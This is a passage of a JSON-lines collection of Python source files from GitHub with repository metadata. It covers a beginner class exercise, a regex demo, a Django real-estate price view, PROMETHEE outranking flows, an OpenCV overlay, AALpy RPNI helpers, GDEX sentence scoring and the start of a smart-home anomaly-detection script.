\"\\n\"\r\n rep += \"ATK: \" + self.ATK + \"\\n\"\r\n rep += \"DEF: \" + self.DEF + \"\\n\"\r\n return rep\r\n def update_health(self, delta):\r\n self.health = delta\r\n\r\n\r\ndef main():\r\n crit = playerClass(\"bob\",\"6\",\"21\",\"22\",\"22\") #shortens class\r\n crit.talk() #class w/ fun\r\n crit.update_health(\"+5\")\r\n print(crit)\r\n\r\n\r\n\r\nmain()\r\n##============================================================##\r\n","repo_name":"ChocolaKuma/MCC_Learning_Python","sub_path":"10072014c.py","file_name":"10072014c.py","file_ext":"py","file_size_in_byte":2372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"7681407057","text":"\"\"\"RegEx finditer function\"\"\"\n\n\nimport re\nimport requests\n\n\n# re.finditer(pattern, string, flags=0)\nhtml = requests.get(\"https://docs.python.org/2/library/re.html\").text\npattern = r\"\\b(the\\s+\\w+)\\s+\"\nregex = re.compile(pattern, re.IGNORECASE)\nfor match in regex.finditer(html):\n print(f\"{match.start()}: {match.group(1)}\")\n","repo_name":"Maulik5041/Everyday-coding","sub_path":"Regex/finditer.py","file_name":"finditer.py","file_ext":"py","file_size_in_byte":326,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"1738516638","text":"from django.shortcuts import render\nfrom .models import Annonce\nfrom .forms import Form_Annonce, Form_Add\nfrom django.db.models import Avg\nimport requests\nimport json\n\n# Create your views here.\n\ndef accueil(request):\n ann_form = Form_Annonce()\n add_form = Form_Add()\n\n result_moy, quartile10, quartile90, err = None, None, None, None\n message = None\n\n if request.method == \"POST\":\n form_a = Form_Annonce(request.POST)\n form_l = Form_Add(request.POST)\n if form_a.is_valid():\n data = form_a.cleaned_data\n if data['code_ville']:\n result_moy = Annonce.objects.filter(code_ville = data['code_ville']).aggregate(moyenne = Avg('prix'))['moyenne']\n liste_prix = Annonce.objects.filter(code_ville = data['code_ville']).order_by('prix').values_list('prix', flat=True)\n if len(liste_prix) != 0:\n quartile10 = liste_prix[len(liste_prix) // 10]\n quartile90 = liste_prix[len(liste_prix) * 9 // 10]\n else: err = True\n elif data['ville']:\n data['ville'] = data['ville'].lower()\n result_moy = Annonce.objects.filter(ville = data['ville']).aggregate(moyenne = Avg('prix'))['moyenne']\n liste_prix = Annonce.objects.filter(ville = data['ville']).order_by('prix').values_list('prix', flat=True)\n if len(liste_prix) != 0:\n quartile10 = liste_prix[len(liste_prix) // 10]\n quartile90 = liste_prix[len(liste_prix) * 9 // 10]\n else: err = True\n elif data['departement']:\n result_moy = Annonce.objects.filter(departement = data['departement']).aggregate(moyenne = Avg('prix'))['moyenne']\n liste_prix = Annonce.objects.filter(departement = data['departement']).order_by('prix').values_list('prix', flat=True)\n if len(liste_prix) != 0:\n quartile10 = liste_prix[len(liste_prix) // 10]\n quartile90 = liste_prix[len(liste_prix) * 9 // 10]\n else: err = True\n if result_moy: result_moy = int(result_moy)\n if form_l.is_valid():\n # Find the id, ask API and return useful data\n lien = str(form_l.cleaned_data['lien'])\n \n id_bien = lien[lien.find(\"/ag\") + 3: lien.find(\"?q\")]\n\n url = \"https://www.bienici.com/realEstateAd.json?id=ag\" + str(id_bien)\n response = requests.get(url)\n if response.ok:\n json_data = json.loads(response.content)\n code_postal, ville, prix = json_data['postalCode'], json_data['city'], json_data['priceWithoutFees']\n try:\n annonce = Annonce(prix = prix, departement = code_postal[:-3], ville = ville, code_ville = code_postal)\n annonce.save()\n message = \"L'annonce \" + id_bien + \" a bien été enregistrée dans la base de données\"\n except:\n message = \"Erreur lors de l'ajout de l'annonce\"\n pass\n\n return render(request, \"app_data/home.html\", context={\"ann_form\": ann_form, \"add_form\": add_form, \"result_moy\": result_moy, \"quartile10\": quartile10, \"quartile90\": quartile90, \"err\": err, \"message\": message})\n \n","repo_name":"maelc49/test_technique","sub_path":"1_Dev/exercice_dev/app_data/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3341,"program_lang":"python","lang":"fr","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"19279729422","text":"\"\"\"\n This module computes the outranking flows if basic(PROMETHEE I) or\n profile-based style.\n\n Implementation and naming of conventions are taken from\n :cite:p:'BransMareschal2005'\n\"\"\"\nimport pandas as pd\nfrom core.enums import FlowType\nfrom typing import Tuple, Union\n\n__all__ = [\"calculate_promethee_outranking_flows\"]\n\nfrom core.input_validation import basic_outranking_flows_validation, \\\n profile_based_outranking_flows_validation, \\\n check_outranking_flows_type\n\n\ndef _calculate_flow(preferences: Union[Tuple[pd.DataFrame, pd.DataFrame],\n pd.DataFrame],\n positive: bool = True) -> pd.Series:\n \"\"\"\n Calculate positive or negative outranking flow in basic(PROMETHEE I)\n style.\n\n :param preferences: pd.DataFrame with alternatives as index and\n alternatives as columns or Tuple of pd.DataFrame with alternatives as\n index and profiles as columns and pd.DataFrame with profiles as index\n and alternatives as columns.\n :param positive: bool, if True function returns positive outranking flow\n else returns negative outranking flow.\n :return: pd.Series with alternatives as index and positive or\n negative flows are values.\n \"\"\"\n if isinstance(preferences, tuple):\n if positive:\n flows = preferences[0].mean(axis=1)\n else:\n flows = preferences[1].mean(axis=0)\n return flows\n else:\n # Current alternative is not took into account\n # (btw. its inner preference is 0)\n axis = 1 if positive else 0\n aggregated_preferences = \\\n preferences.sum(axis=axis) / (preferences.shape[0] - 1)\n\n return aggregated_preferences\n\n\ndef _calculate_profile_based_flow(preferences: Tuple[pd.DataFrame,\n pd.DataFrame],\n profiles_preferences: pd.DataFrame,\n positive: bool = True) -> pd.Series:\n \"\"\"\n Calculate positive or negative outranking profile-based flows.\n\n :param preferences: Tuple of pd.DataFrame with alternatives as index\n and profiles as columns and pd.DataFrame with profiles as index\n and alternatives as columns.\n :param profiles_preferences: pd.DataFrame with profiles as index and\n profiles as columns.\n bool, if True function returns positive outranking flow\n else returns negative outranking flow.\n :return: pd.Series with\n MultiIndex(\"R\" + alternatives, profiles + alternative) as index and\n positive or negative flows are values.\n \"\"\"\n n_profiles = len(profiles_preferences)\n alternatives_groups_flows = []\n alternatives_groups_names = []\n axis = 1 if positive else 0\n\n # Iterate over alternatives\n for alternative, alternative_preferences in preferences[0].iterrows():\n # Create subset of profiles + current alternative preferences\n\n # Copy profiles preferences\n alternative_group_preferences = profiles_preferences.copy()\n # Add current alternative preferences to the end of\n # the subset (row and column)\n alternative_group_preferences.loc[alternative] = \\\n alternative_preferences\n alternative_group_preferences[alternative] = \\\n preferences[1][alternative]\n\n # Calculate flows for current group\n alternatives_groups_flows.append(\n alternative_group_preferences.sum(axis=axis) / n_profiles)\n alternatives_groups_names.append(f\"R{alternative}\")\n\n # Combine all groups flows\n return pd.concat(\n alternatives_groups_flows, keys=alternatives_groups_names)\n\n\ndef calculate_promethee_outranking_flows(\n preferences: Union[Tuple[pd.DataFrame, pd.DataFrame], pd.DataFrame],\n flow_type: FlowType,\n profiles_preferences: pd.DataFrame = None) -> pd.DataFrame:\n \"\"\"\n Calculate outranking flows in 
basic(PROMETHEE I) or profile-based style.\n Basic(PROMETHEE I) flows are calculated as mean of subtractions of\n preferences where current alternative is preferred to\n profiles/alternatives and preferences where profiles/alternatives\n is preferred to current alternative.\n Profile-based flows are calculated by creating\n subsets: profiles + current alternative and calculating flows in that\n set as in basic style. Because of modularity of this project\n preferences for that flows are obtained in different way (needs\n alternatives vs profiles and profiles vs profiles preferences).\n\n :param preferences: pd.DataFrame with alternatives as index and\n alternatives as columns or Tuple of pd.DataFrame with alternatives as\n index and alternatives as columns and pd.DataFrame with profiles as index\n and alternatives as columns.\n :param flow_type: FlowType enum with type of outranking\n flows (BASIC OR PROFILE_BASED).\n :param profiles_preferences: pd.DataFrame with profiles as index and\n profiles as columns.\n :return: pd.DataFrame with alternatives as index and 'positive' and\n 'negative' columns if flow_type is BASIC or pd.DataFrame with\n MultiIndex(\"R\" + alternatives, profiles+alternative) as index and\n 'positive' and 'negative' columns if flow_type is PROFILE_BASED.\n \"\"\"\n\n # flow_type validation\n check_outranking_flows_type(flow_type)\n\n if flow_type == FlowType.BASIC:\n # Input validation for basic(PROMETHEE I) style\n basic_outranking_flows_validation(preferences)\n\n # Get alternatives as index\n index = preferences[0].index if isinstance(preferences, tuple) \\\n else preferences.index\n return pd.DataFrame({'positive': _calculate_flow(preferences),\n 'negative':\n _calculate_flow(preferences, positive=False)\n }, index=index)\n\n elif flow_type == FlowType.PROFILE_BASED:\n # Input validation for profile-based style\n profile_based_outranking_flows_validation(preferences,\n profiles_preferences)\n return pd.DataFrame({'positive': _calculate_profile_based_flow(\n preferences, profiles_preferences),\n 'negative': _calculate_profile_based_flow(\n preferences, profiles_preferences,\n positive=False)})\n","repo_name":"WAndraszyk/Construct-your-own-PROMETHEE-with-Python-for-MCDA","sub_path":"modular_parts/flows/M8_PrometheeOutrankingFlows.py","file_name":"M8_PrometheeOutrankingFlows.py","file_ext":"py","file_size_in_byte":6350,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"7"}
+{"seq_id":"23576089815","text":"import cv2\nimport numpy as np\n\nimg1 = cv2.imread('robot.jpg')\nimg2 = cv2.imread('opencv-logo2.png')\n#cv2.imshow('img1',img1)\n#cv2.imshow('img2',img2)\n\nrows, cols, channels = img2.shape\n#print(img2.shape)\nroi = img1[0:rows, 0:cols]\n#cv2.imshow('roi',roi)\nimg2gray = cv2.cvtColor(img2, cv2.COLOR_BGR2GRAY)\n#cv2.imshow('img2gray',img2gray)\nret, mask = cv2.threshold(img2gray, 10,255, cv2.THRESH_BINARY)\n#cv2.imshow('mask',mask)\nmask_inv = cv2.bitwise_not(mask)\n#cv2.imshow('mask_inv',mask_inv)\nimg1_bg = cv2.bitwise_and(roi, roi, mask= mask_inv)\nimg1_fg = cv2.bitwise_and(img2,img2, mask=mask)\n#cv2.imshow('img1_bg',img1_bg)\n#cv2.imshow('img1_fg',img1_fg)\ndst = cv2.add(img1_bg,img1_fg)\n#cv2.imshow('dst',dst)\nimg1[0:rows, 0:cols] = dst\ncv2.imshow('img1',img1)\ncv2.waitKey()\n \n","repo_name":"siddhesh13/raspberryPi","sub_path":"OpenCV/addingTwoImages.py","file_name":"addingTwoImages.py","file_ext":"py","file_size_in_byte":774,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"33232054788","text":"import pickle\nimport queue\nfrom functools import total_ordering\nfrom typing import Set\n\n\n@total_ordering\nclass RpniNode:\n __slots__ = ['output', 'children', 'prefix', \"type\"]\n\n def __init__(self, output=None, children=None, automaton_type='moore'):\n if output is None and automaton_type == 'mealy':\n output = dict()\n if children is None:\n children = dict()\n self.output = output\n self.children = children\n self.prefix = ()\n self.type = automaton_type\n\n def shallow_copy(self):\n output = self.output if self.type != 'mealy' else dict(self.output)\n return RpniNode(output, dict(self.children), self.type)\n\n def copy(self):\n return pickle.loads(pickle.dumps(self, -1))\n\n def __lt__(self, other):\n return (len(self.prefix), self.prefix) < (len(other.prefix), other.prefix)\n\n def __eq__(self, other):\n return self.prefix == other.prefix\n\n def __hash__(self):\n return id(self) # TODO This is a hack\n\n def get_all_nodes(self) -> Set['RpniNode']:\n qu = queue.Queue()\n qu.put(self)\n nodes = set()\n while not qu.empty():\n state = qu.get()\n nodes.add(state)\n for child in state.children.values():\n if child not in nodes:\n qu.put(child)\n return nodes\n\n def to_automaton(self):\n nodes = self.get_all_nodes()\n nodes.remove(self) # dunno whether order is preserved?\n nodes = [self] + list(nodes)\n return to_automaton(nodes, self.type)\n\n def compatible_outputs(self, other):\n so, oo = [self.output, other.output]\n cmp = lambda x, y: x is None or y is None or x == y\n if self.type == 'moore':\n return cmp(so, oo)\n else:\n return all(cmp(so[key], oo[key]) for key in filter(lambda k: k in oo, so))\n\n def get_child_by_prefix(self, prefix):\n node = self\n for symbol in prefix:\n node = node.children[symbol]\n return node\n\n\nclass StateMerging:\n def __init__(self, data, automaton_type, print_info=True):\n self.data = data\n self.automaton_type = automaton_type\n self.print_info = print_info\n\n self.root = createPTA(data, automaton_type)\n self.merges = []\n\n def merge(self, red_node, lex_min_blue, copy_nodes=False):\n \"\"\"\n Merge two states and return the root node of resulting model.\n \"\"\"\n\n if self.automaton_type == 'mealy':\n raise NotImplementedError()\n\n if not copy_nodes:\n self.merges.append((red_node, lex_min_blue))\n\n root_node = self.root.copy() if copy_nodes else self.root\n lex_min_blue = lex_min_blue.copy() if copy_nodes else lex_min_blue\n\n red_node_in_tree = root_node\n for p in red_node.prefix:\n red_node_in_tree = red_node_in_tree.children[p]\n\n to_update = root_node\n for p in lex_min_blue.prefix[:-1]:\n to_update = to_update.children[p]\n\n to_update.children[lex_min_blue.prefix[-1]] = red_node_in_tree\n\n if not self._fold(red_node_in_tree, lex_min_blue, not copy_nodes):\n return None\n\n return root_node\n\n def _fold(self, red_node, blue_node, report):\n # Change the output of red only to concrete output, ignore None\n if report and not RpniNode.compatible_outputs(red_node, blue_node):\n print(f\"conflict {red_node.prefix} ({red_node.output}) {blue_node.prefix} ({blue_node.output})\")\n return False\n red_node.output = blue_node.output if blue_node.output is not None else red_node.output\n\n for i in blue_node.children.keys():\n if i in red_node.children.keys():\n self._fold(red_node.children[i], blue_node.children[i], report)\n else:\n red_node.children[i] = blue_node.children[i]\n return True\n\n def to_automaton(self):\n return self.root.to_automaton()\n\n def replay_log(self, commands: list):\n for 
command, args in commands:\n if command == \"merge\":\n self.merge(self.root.get_child_by_prefix(args[0]), self.root.get_child_by_prefix(args[1]))\n elif command == \"promote\":\n pass\n\n @staticmethod\n def replay_log_on_pta(data, commands: list, automaton_type):\n sm = StateMerging(data, automaton_type)\n sm.replay_log(commands)\n return sm.to_automaton()\n\n\ndef check_sequence(root_node, seq, automaton_type):\n \"\"\"\n Checks whether each sequence in the dataset is valid in the current automaton.\n \"\"\"\n curr_node = root_node\n for i, o in seq:\n if automaton_type == 'mealy':\n input_outputs = {i: o for i, o in curr_node.children.keys()}\n if i[0] not in input_outputs.keys() or o is not None and input_outputs[i[0]] != o:\n return False\n curr_node = curr_node.children[(i[0], input_outputs[i[0]])]\n else:\n # For dfa and moore, check if outputs are the same, iff output in test data is concrete (not None)\n curr_node = curr_node.children[i]\n if o is not None and curr_node.output != o:\n return False\n return True\n\n\ndef createPTA(data, automaton_type):\n data.sort(key=lambda x: len(x[0]))\n\n root_node = RpniNode(automaton_type=automaton_type)\n for seq, label in data:\n curr_node = root_node\n for idx, symbol in enumerate(seq):\n if symbol not in curr_node.children.keys():\n node = RpniNode(automaton_type=automaton_type)\n node.prefix = curr_node.prefix + (symbol,)\n curr_node.children[symbol] = node\n\n if automaton_type == 'mealy' and idx == len(seq) - 1:\n if symbol not in curr_node.output:\n curr_node.output[symbol] = label\n if curr_node.output[symbol] != label:\n return None\n curr_node = curr_node.children[symbol]\n if automaton_type == 'moore' or automaton_type == 'dfa':\n if curr_node.output is None:\n curr_node.output = label\n if curr_node.output != label:\n return None\n\n return root_node\n\n\ndef extract_unique_sequences(root_node):\n def get_leaf_nodes(root):\n leaves = []\n\n def _get_leaf_nodes(node):\n if node is not None:\n if len(node.children.keys()) == 0:\n leaves.append(node)\n for n in node.children.values():\n _get_leaf_nodes(n)\n\n _get_leaf_nodes(root)\n return leaves\n\n leaf_nodes = get_leaf_nodes(root_node)\n paths = []\n for node in leaf_nodes:\n seq = []\n curr_node = root_node\n for i in node.prefix:\n curr_node = curr_node.children[i]\n seq.append((i, curr_node.output))\n paths.append(seq)\n\n return paths\n\n\ndef to_automaton(red, automaton_type):\n from aalpy.automata import DfaState, Dfa, MooreMachine, MooreState, MealyMachine, MealyState\n\n if automaton_type == 'dfa':\n state, automaton = DfaState, Dfa\n elif automaton_type == 'moore':\n state, automaton = MooreState, MooreMachine\n else:\n state, automaton = MealyState, MealyMachine\n\n initial_state = None\n prefix_state_map = {}\n for i, r in enumerate(red):\n if automaton_type == 'moore' or automaton_type == 'dfa':\n prefix_state_map[r.prefix] = state(f's{i}', r.output)\n else:\n prefix_state_map[r.prefix] = state(f's{i}')\n if i == 0:\n initial_state = prefix_state_map[r.prefix]\n\n for r in red:\n for i, c in r.children.items():\n if automaton_type == 'moore' or automaton_type == 'dfa':\n prefix_state_map[r.prefix].transitions[i] = prefix_state_map[c.prefix]\n else:\n prefix_state_map[r.prefix].transitions[i] = prefix_state_map[c.prefix]\n prefix_state_map[r.prefix].output_fun[i] = r.output[i] if i in r.output else None\n\n return automaton(initial_state, list(prefix_state_map.values()))\n\n\ndef visualize_pta(root_node, path='pta.pdf'):\n from pydot import Dot, Node, Edge\n graph = 
Dot('fpta', graph_type='digraph')\n\n graph.add_node(Node(str(root_node.prefix), label=f'{root_node.output}'))\n\n queue = [root_node]\n visited = set()\n visited.add(root_node.prefix)\n while queue:\n curr = queue.pop(0)\n for i, c in curr.children.items():\n if c.prefix not in visited:\n graph.add_node(Node(str(c.prefix), label=f'{c.output}'))\n graph.add_edge(Edge(str(curr.prefix), str(c.prefix), label=f'{i}'))\n if c.prefix not in visited:\n queue.append(c)\n visited.add(c.prefix)\n\n graph.add_node(Node('__start0', shape='none', label=''))\n graph.add_edge(Edge('__start0', str(root_node.prefix), label=''))\n\n graph.write(path=path, format='pdf')\n","repo_name":"DES-Lab/AALpy","sub_path":"aalpy/learning_algs/deterministic_passive/rpni_helper_functions.py","file_name":"rpni_helper_functions.py","file_ext":"py","file_size_in_byte":9033,"program_lang":"python","lang":"en","doc_type":"code","stars":121,"dataset":"github-code","pt":"7"}
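A minimal usage sketch for the prefix-tree builder, assuming this module is importable from an installed AALpy checkout at the path given in the metadata; the sample data is invented, in the (sequence, label) shape createPTA expects for a Moore machine:

from aalpy.learning_algs.deterministic_passive.rpni_helper_functions import createPTA

data = [(('a',), 1), (('a', 'b'), 0), (('b',), 0), (('b', 'a'), 1)]
root = createPTA(data, 'moore')
# One RpniNode per distinct prefix; root.to_automaton() would yield a MooreMachine
print(sorted(node.prefix for node in root.get_all_nodes()))
# -> [(), ('a',), ('a', 'b'), ('b',), ('b', 'a')]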
+{"seq_id":"33390920711","text":"import csv\nimport ast\n\nfreq_most_common = []\nfreq_common = []\n# punctuation_pos = [\"SENT\", \"#\", \"$\", \"\\\"\", \"''\", \"'\", \"(\", \")\", \",\", \":\"]\n\n# ------------------------------------- GDEX POINTS -----------------------------------------------------\n\n\n# Sentence length: a sentence between 10 and 20 words long was preferred, with and shorter ones penalized.\n# No sentence is longer than 20 words.\n\ndef sentence_length(m_lemma_tag):\n # points = 20\n sent_length = len(m_lemma_tag)\n\n # sentence is greater than 10\n if sent_length >= 10:\n points = 20\n # sentence is smaller than 10\n else:\n points = 20 * (sent_length/10)\n\n return points\n\n\n# Word frequencies: a sentence was penalized for each word that was not amongst the commonest 17,000 words in the\n# language, with a further penalty applied for rare words.\n# max Points = 3\ndef common_words(m_lemma_tag):\n points = 0\n x = 100 / len(m_lemma_tag)\n # print(len(m_sentence[1]))\n\n # one free 'Punct' for end of sentence every other is negative\n punctuations = 0\n for m_word in m_lemma_tag:\n if m_word[1] == 'Punct':\n if punctuations == 0:\n points += x\n punctuations += 1\n else:\n # if you ignore proper nouns the resulting 'good' sentences are really bad\n if m_word[0] in freq_most_common:\n points += x\n elif m_word[0] in freq_common:\n points += x/2\n\n # for m_word in m_sentence[1]:\n # if m_word[0] in freq_most_common:\n # points += x\n # elif m_word[0] in freq_common:\n # points += x / 2\n\n points = 50 * (points/100)\n return points\n\n\n# Sentences containing pronouns and anaphors like this that it or one often fail to present a self-contained piece of\n# language which makes sense without further context, so sentences containing these words were penalized.\n# max Points = 1\ndef contain_pronouns_anaphora(m_lemma_tag):\n x = len(m_lemma_tag)\n found = x\n for m_word in m_lemma_tag:\n if m_word[1] == \"Pron\":\n found -= 1\n\n points = 20 * (found/x)\n return points\n\n\n# Whole sentenceidentified as beginning with a capital letter and ending with a full step, exclamation mark, or\n# question mark, were preferred.\n# max Points = 2\ndef whole_sentence(m_sentence):\n points = 10\n punctuation = [\"!\", \".\", \"?\"]\n #quote = ['\\'', '\"']\n first_letter = m_sentence[:1]\n last_letter = m_sentence[-1]\n\n if first_letter.isupper(): # or first_letter in quote:\n if last_letter in punctuation:\n pass # is upper and has punctuation\n else:\n points -= 5 # is upper and has no punctuation\n else:\n if last_letter in punctuation:\n points -= 5 # is not upper and has punctuation\n else:\n points -= 10 # is not upper and has no punctuation\n\n return points\n\n\n# ------------------------------------- LOAD FREQUENCIES --------------------------------------------------\n\ndef load_frequencies():\n with open('lemma.num.17000.txt', 'r') as freq_in:\n f = csv.reader(freq_in, delimiter=' ')\n row_number = 1\n for row in f:\n if row_number <= 7000:\n freq_most_common.append(row[2])\n else:\n freq_common.append(row[2])\n row_number += 1\n freq_in.close()\n\n\ndef compute_points(m_sentence, m_lemma_tag):\n\n points_len = sentence_length(m_lemma_tag) # max 20p\n # print(\"len\", points_len, \"/\", 20)\n\n points_common = common_words(m_lemma_tag) # max 50p\n # print(\"com\", points_common, \"/\", 50)\n\n points_pronoun = contain_pronouns_anaphora(m_lemma_tag) # max 20p\n # print(\"pro\", points_pronoun, \"/\", 20)\n\n points_whole_sent = whole_sentence(m_sentence) # max 10p\n # 
print(\"sent\", points_whole_sent, \"/\", 10)\n\n m_gdex_points = points_len + points_common + points_pronoun + points_whole_sent\n return round(m_gdex_points, 1)\n\n\ndef main():\n if __name__ == \"__main__\":\n print(\"#### starting loading sentence file ####\")\n\n with open(\"./output/03_1_sentences_from_corpus.txt\", 'r') as read_sent, \\\n open(\"./output/03_2_calculate_GDEX.csv\", \"w\") as s_out:\n index = 1\n writer = csv.writer(s_out, delimiter=';')\n good_sentence = 0\n bad_sentence = 0\n for line in read_sent:\n if index % 100000 == 0:\n print(\"{:,}\".format(index), \"/\", \"{:,}\".format(15500000))\n index += 1\n\n row_as_list = ast.literal_eval(line)\n\n # 0 | 1 | 2 | 3 | 4 | 5\n # vocable | chapter | book | sentence | lemmatag | lemmavocdict\n\n sentence = row_as_list[3]\n lemma_tag = row_as_list[4]\n\n gdex_number = compute_points(sentence, lemma_tag)\n row_as_list.insert(3, gdex_number)\n\n if gdex_number > 60:\n good_sentence += 1\n writer.writerow([row_as_list[0]] + [row_as_list[1]] + [row_as_list[2]] + [row_as_list[3]]\n + [row_as_list[4]] + [row_as_list[5]] + [row_as_list[6]])\n else:\n bad_sentence += 1\n\n s_out.close()\n read_sent.close()\n print(\"#### finished loading sentence file ####\")\n print(\"good:\", good_sentence)\n print(\"bad:\", bad_sentence)\n\n\nif __name__ == \"__main__\":\n print(\"#### starting loading sentence file ####\")\n average = 0\n index = 1\n highest = 0\n lowest = 100\n with open(\"./output/03_1_sentences_from_corpus.txt\", 'r') as read_sent, \\\n open(\"./output/03_2_calculate_GDEX.csv\", \"w\") as s_out:\n\n writer = csv.writer(s_out, delimiter=';')\n good_sentence = 0\n bad_sentence = 0\n for line in read_sent:\n if index % 100000 == 0:\n print(\"{:,}\".format(index), \"/\", \"{:,}\".format(15500000))\n index += 1\n\n row_as_list = ast.literal_eval(line)\n\n # 0 | 1 | 2 | 3 | 4 | 5\n # vocable | chapter | book | sentence | lemmatag | lemmavocdict\n\n sentence = row_as_list[3]\n lemma_tag = row_as_list[4]\n\n gdex_number = compute_points(sentence, lemma_tag)\n row_as_list.insert(3, gdex_number)\n\n average += gdex_number\n if gdex_number > highest:\n highest = gdex_number\n if gdex_number < lowest:\n lowest = gdex_number\n\n if gdex_number > 50:\n #print(sentence)\n #if \"I can smell\" in sentence:\n # print(\"gdex:\", gdex_number, sentence)\n good_sentence += 1\n writer.writerow([row_as_list[0]] + [row_as_list[1]] + [row_as_list[2]] + [row_as_list[3]]\n + [row_as_list[4]] + [row_as_list[5]] + [row_as_list[6]])\n else:\n bad_sentence += 1\n\n s_out.close()\n read_sent.close()\n print(\"#### finished loading sentence file ####\")\n print(\"good:\\t\", good_sentence)\n print(\"bad:\\t\", bad_sentence)\n print(\"avg:\\t\", gdex_number / index)\n print(\"high:\\t\", highest)\n print(\"low:\\t\", lowest)\n","repo_name":"Mells/Preprocess03","sub_path":"O3_extract_sentences_from_corpus/O3_2_calculate_GDEX.py","file_name":"O3_2_calculate_GDEX.py","file_ext":"py","file_size_in_byte":7411,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"7"}
+{"seq_id":"36763785377","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\n#from ARAS datasets Selected House A\n#Anomaly state is checked for resident 1 in House A\n#We divided the datasets into two equal parts\n#We used all the second 15 days of the datasets in to check for anomalies\n#You can change this division\n\n# DATASETS :\n# Change to CSV format \n# Add a row (first row) for the sensor name and resident number (In short)\n# Add a column to show the seconds.\n\n\n#The first 15 days (two weeks) are used for the initial learning of the algorithm.\n#from the sixteenth day, NNC begins to be calculated.\n\n# Pay Attention:\n# To use this code, the reading part of the datasets must be changed\n\n###............................................. Main Part ............................................\n\nimport random\nimport statistics\nimport numpy as np\nimport pandas as pd\nfrom sklearn import tree\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score\nfrom sklearn.metrics import classification_report\nfrom sklearn.metrics import precision_recall_fscore_support as score\n\n#........................................... Functions ..................................... :\n\ndef randomcheck(testday ,resident, classcode):\n subNNC = 0\n y = testday['r'+str(resident)]\n if classcode == 10 or classcode == 20:\n testday.drop(['r1'], axis=1 , inplace = True)\n testday.drop(['r2'], axis=1 , inplace = True)\n else:\n testday.drop(['r'+str(resident)], axis=1 , inplace = True)\n T = 0\n for i in range (3600):\n rt = random.randint(1,86400)\n yt = y[rt-1:rt]\n xt = testday[rt-1:rt]\n yp = globals()[\"dt\"+str(classcode)].predict(xt)\n if int(yt) == yp:\n T = T + 1\n if T < 900:\n subNNC = 20\n if T > 900 and T < 1400:\n subNNC = 14 \n if T > 1400 and T < 1900:\n subNNC = 12\n if T > 1900 and T < 2400:\n subNNC = 5\n if T > 2400 and T < 2900:\n subNNC = 3\n if T > 2900 and T < 3400:\n subNNC = 1\n return subNNC\n\n#.............////////////////////..............\n\ndef TimePart(day,resident):\n for g in range(27):\n globals()[\"p\"+str(g+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n for n in range(24):\n for t in range(27):\n globals()[\"h\"+str(t+1)] = 0\n for s in range((n)*3600,((n+1)*3600)-1):\n o = day['r'+str(resident)][s]\n globals()[\"h\"+str(o)] = 1 + globals()[\"h\"+str(o)]\n if globals()[\"h\"+str(o)] > 60:\n globals()[\"p\"+str(o)][n] = 1\n out = [p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13 , p14,\n p15, p16, p17, p18, p19, p20, p21, p22, p23, p24, p25, p26, p27]\n return out\n\n#.............////////////////////..............\n\ndef predNorm (x, classcode):\n \n for b in range(27):\n globals()[\"p\"+str(b+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n for n in range(24):\n for b in range(27):\n globals()[\"y_pred\"+str(b+1)] = 0\n for s in range((n)*3600,((n+1)*3600)-1):\n pred = int(globals()[\"dt\"+str(classcode)].predict(x[s:s+1]))\n globals()[\"y_pred\"+str(pred)] = 1 + globals()[\"y_pred\"+str(pred)] \n if globals()[\"y_pred\"+str(pred)] > 60:\n globals()[\"p\"+str(pred)][n] = 1\n ex = [p1, p2, p3, p4, p5, p6, p7, p8, p9, p10, p11, p12, p13 , p14,\n p15, p16, p17, p18, p19, p20, p21, p22, p23, p24, p25, p26, p27] \n return ex\n\ndef checkpred (tday, resident, classcode):\n subNNC = 0\n real = TimePart(tday,resident)\n if classcode == 10 or classcode == 20:\n tday.drop(['r1'], axis=1 , inplace = True)\n tday.drop(['r2'], axis=1 , inplace = True)\n else:\n tday.drop(['r'+str(resident)], axis=1 , 
inplace = True)\n x_test = tday\n pred = predNorm(x_test, classcode)\n for d in range(27):\n if real[d] != pred[d]:\n subNNC = 1 + subNNC\n return subNNC\n\n#.............////////////////////..............\n\ndef norm (tday,resident):\n subNNC = 0\n for g in range(27):\n globals()[\"k\"+str(g+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]\n\n#In this section, the datasets of the days should be entered in order\n for i in range(15):\n d = pd.read_csv('c://DAY_0'+str(i+1)+'.csv' , encoding = 'ansi')\n y = TimePart(d,resident) \n for f in range(27):\n for p in range(24):\n globals()[\"k\"+str(f+1)][p] = globals()[\"k\"+str(f+1)][p] + y[f][p]\n\n j = TimePart(tday,resident)\n for f in range(27):\n for k in range(24):\n timechart = globals()[\"k\"+str(f+1)][k]\n tcharttest = j[f][k]\n if timechart < 3 and tcharttest == 1:\n subNNC = subNNC + 1\n if timechart > 12 and tcharttest == 0:\n subNNC = subNNC + 1\n return subNNC\n\n#.............////////////////////..............\n\ndef sectable (dy, resident):\n\n for g in range(27):\n globals()[\"sec\"+str(g+1)] = [0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0] \n for n in range(24):\n for x in range((n)*3600,((n+1)*3600)-1):\n o = dy['r'+str(resident)][x]\n globals()[\"sec\"+str(o)][n] = 1 + globals()[\"sec\"+str(o)][n]\n secout = [sec1,sec2,sec3,sec4,sec5,sec6,sec7,sec8,sec9,sec10,sec11,sec12,sec13,sec14,\n sec15,sec16,sec17,sec18,sec19,sec20,sec21,sec22,sec23,sec24,sec25,sec26,sec27]\n return secout\n\ndef MaxMin (resident):\n for g in range(27):\n globals()[\"ma\"+str(g+1)] = 